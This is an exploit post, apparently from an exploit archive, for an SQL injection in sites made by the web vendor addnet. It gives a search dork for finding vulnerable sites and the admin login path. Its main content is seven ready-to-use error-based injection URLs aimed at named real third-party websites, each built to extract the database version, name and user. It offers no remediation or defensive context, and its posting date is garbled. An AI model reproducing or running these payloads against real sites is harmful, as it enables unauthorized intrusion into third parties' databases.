Addnet SQL injection Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>addnet SQL injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : addnet SQL injection Vulnerability # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://www.addnet.com.tw/ # # Google Dork : intext:"Design By addnet" inurl:/news.php?newsId= # # Date: 2017 03 February # # Tested On : Win 10 / Google Chrome / Mozilla Firefox # ###################### # admin page : target/admin/login.php # # demos : # http://londer.com.tw/news.php?newsId=8 or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1-- # http://www.deryuan.com/news.php?newsId=9 or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1-- # http://www.nexmoda.com/news.php?newsId=9 or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1-- # http://www.landu.com.tw/news.php?newsId=9 or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1-- # http://makeeyes.com.tw/news.php?newsId=9 or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1-- # http://www.dr-health.com.tw/news.php?newsId=9 or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1-- # http://www.varocana.com/news.php?newsId=9 or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1-- # ###################### # # discovered by : modiret # ######################</BODY></HTML>